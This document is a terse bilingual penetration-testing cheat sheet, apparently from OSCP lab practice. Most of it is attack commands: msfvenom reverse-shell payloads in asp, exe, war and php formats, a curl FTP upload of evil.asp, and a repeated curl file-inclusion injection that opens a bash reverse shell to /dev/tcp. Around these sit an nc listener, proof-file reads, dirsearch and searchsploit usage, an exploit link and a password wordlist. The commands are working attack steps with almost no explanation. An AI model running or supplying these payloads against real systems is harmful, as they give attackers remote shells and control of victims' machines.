WQs6nqCFbG8
面板https://10.70.70.70/oscpanel/labcpanel.php?md=6eeb4a473630fbf33895939e77c2dcc5&pid=584571&servers=0
https://10.70.70.70/oscpanel/labcpanel.php?md=6eeb4a473630fbf33895939e77c2dcc5&pid=584571&servers=0
生 > 丟 > touch > 收 
每次生成....'port'一定要改

msfvenom -p windows/shell_reverse_tcp LHOST=自己 LPORT=443 -f asp > evil.asp
msfvenom -p windows/shell_reverse_tcp LHOST=自己 LPORT=443 -f exe > evil.exe
msfvenom -p java/shell_reverse_tcp LHOST=自己 LPORT=442 -f war > evil.war

#msfvenom -p php/reverse_php LHOST=自己 LPORT=443 R > evil.txt
#msfvenom -p php/reverse_php LHOST=自己 LPORT=443 -f raw > evil.php
#msfvenom -p php/meterpreter_reverse_tcp LHOST=自己 LPORT=443 -f raw > evil.php


curl -X PUT -T "evil.asp" "ftp://10.11.1.14/wwwroot/"

curl -s --data "<?system('bash -i >& /dev/tcp/10.11.0.131/443 0>&1');?>" "http://10.11.1.8/internal/advanced_comment_system/admin.php?ACS_path=php://input%00" | egrep -v ' *<.*' | grep -v -i "check variable"

http://10.11.1.14/evil.asp
nc -lvp 443
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
cat /root/proof.txt
ifconfig沒反應....用 ifconfig-a

git clone https://github.com/maurosoria/dirsearch
需要python3
python3 dirsearch.py -u "http://x.x.x.x/" -e *

上傳檔案
https://www.itread01.com/content/1548806768.html
curl -s --data "<?system('bash -i >& /dev/tcp/10.11.0.44/443 0>&1');?>" "http://10.11.1.8/internal/advanced_comment_system/admin.php?ACS_path=php://input%00" | egrep -v ' *<.*' | grep -v -i "check variable"



搜尋exploit工具 searchsploit
https://github.com/am0nsec/exploit/tree/master/windows/http/RejettoHTTPFileServer-2.3
PsExec v2.2
https://docs.microsoft.com/zh-tw/sysinternals/downloads/psexec


https://github.com/DavidWittman/wpxmlrpcbrute/blob/master/wordlists/1000-most-common-passwords.txt

